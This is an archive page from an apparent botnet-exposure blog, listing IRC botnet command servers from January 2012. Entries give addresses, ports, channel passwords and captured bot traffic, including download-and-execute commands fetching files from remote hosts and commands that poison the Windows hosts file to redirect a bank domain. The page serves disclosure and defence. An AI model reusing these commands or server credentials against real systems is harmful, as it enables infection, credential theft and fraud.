Month: January 2012

93.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)

By Pig, January 20, 2012
Uncategorized

Remote Host Port Number 93.95.99.87 1866 NICK n[USA|XP|COMPUTERNAME]pxzflri USER hh “” “lol” :hh Now talking in #!h! Modes On: [ #!h! ] [ +smntu ] .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ hosting infos: http://whois.domaintools.com/93.95.99.87

irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)

By Pig, January 18, 2012
Uncategorized

Remote Host Port Number irc.r00t.me.uk 7007 PASS gBot NICK n{USA|XP}eqqcbip USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip i dont have the exe to find more infos so try to find chanels your self this botnet is from same guy here:http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html hosting infos: http://whois.domaintools.com/193.107.16.113

60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

By Pig, January 18, 2012
Uncategorized

Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 70.38.98.237 80 60.190.223.42 5101 PASS hax0r PRIVMSG #US! :[d=”http://img102.herosh.com/2012/01/14/551459105.gif” s=”65536 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/14/594572320.gif” s=”61440 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/04/210592960.gif” s=”27648 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp”Read more...

union-foros.com(irc botnet hosted in Seychelles Ideal Solution Ltd)

By Pig, January 17, 2012
Uncategorized

Remote Host Port Number 193.107.19.60 1863 NICK {XPUSA919273} JOIN #per PRIVMSG #per : 14,1. 15:: [HOST] adido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%system32driversetchosts 3,1 echo 69.64.58.90 viabcp.com >> %windir%system32driversetchosts USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA919273} -ix Now talking in #per Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ] TopicRead more...

d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )

By Pig, January 17, 2012
Uncategorized

This NgrBotnet conect to 3 domains and is aproximatly 100k: Resolved : [d.xludakx.com] To [95.211.165.62] Resolved : [ab.0n3mmm.com] To [95.211.165.62] Resolved : [ab.0n3mmm.com] To [178.33.143.52] Resolved : [ab.0n3mmm.com] To [109.75.176.231] Resolved : [pusikuracbre.com] To [95.211.165.62] Remote Host Port Number 199.15.234.7 80 95.211.165.62 4949 PASS ngrBot 109.75.176.231 4949 PASS ngrBot 178.33.143.52 4949 PASS ngrBot ab.0n3mmm.com +666Read more...

80.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)

By Pig, January 17, 2012
Uncategorized

Remote Host Port Number 109.68.190.217 80 199.15.234.7 80 80.79.112.66 5749 PASS axplm2 NICK n{US|XPa}psbmdzo USER psbmdzo 0 0 :psbmdzo JOIN #chat Amx4k PRIVMSG win7elite :[d=”http://109.68.190.217/alms22.exe” s=”150528 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 exe file: Download Download hosting infos: http://whois.domaintools.com/80.79.112.66

Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)

By Pig, January 12, 2012
Uncategorized

Hosted in USA also called Ramnit by other antiviruses what this malware does: Capability to send out email message(s) with the built-in SMTP client engine. Produces outbound traffic. Communication with a remote SMTP server and sending out email. Downloads/requests other files from Internet. Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode.Read more...